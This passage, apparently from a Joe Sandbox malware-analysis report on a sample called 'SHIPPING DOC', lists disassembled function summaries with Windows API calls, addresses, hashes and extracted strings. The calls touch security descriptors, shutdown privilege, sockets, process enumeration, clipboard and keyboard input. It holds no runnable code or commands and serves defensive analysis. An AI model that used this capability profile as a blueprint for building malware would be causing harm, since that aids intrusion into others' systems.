                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                      • API String ID: 2938487562-3733053543
                                                                                                                      • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                      • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                      • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                      • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                        • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                        • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1255039815-0
                                                                                                                      • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                      • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                      • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                      • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                      APIs
                                                                                                                      • __swprintf.LIBCMT ref: 00433073
                                                                                                                      • __swprintf.LIBCMT ref: 00433085
                                                                                                                      • __wcsicoll.LIBCMT ref: 00433092
                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                      • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1158019794-0
                                                                                                                      • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                      • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                      • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                      • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1737998785-0
                                                                                                                      • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                      • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                      • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                      • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                      • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                      • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                      • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                      • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                      • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                      • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$_strncmp
                                                                                                                      • String ID: @oH$\$^$h
                                                                                                                      • API String ID: 2175499884-3701065813
                                                                                                                      • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                      • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                                      • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                      • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 0046530D
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00465377
                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 004653BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 540024437-0
                                                                                                                      • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                      • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                      • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                      • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                      • API String ID: 0-2872873767
                                                                                                                      • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                      • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                      • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                      • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                      • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                      • _wcscat.LIBCMT ref: 00475657
                                                                                                                      • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2547909840-0
                                                                                                                      • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                      • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                      • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                      • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                      • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                      • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                      • String ID: *.*$\VH
                                                                                                                      • API String ID: 2786137511-2657498754
                                                                                                                      • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                      • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                      • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                      • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                      • String ID: pqI
                                                                                                                      • API String ID: 2579439406-2459173057
                                                                                                                      • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                      • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                      • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                      • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                      APIs
                                                                                                                      • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                      • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicollmouse_event
                                                                                                                      • String ID: DOWN
                                                                                                                      • API String ID: 1033544147-711622031
                                                                                                                      • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                      • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                      • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                      • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardMessagePostState$InputSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3031425849-0
                                                                                                                      • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                      • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                      • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                      • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 0047666F
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
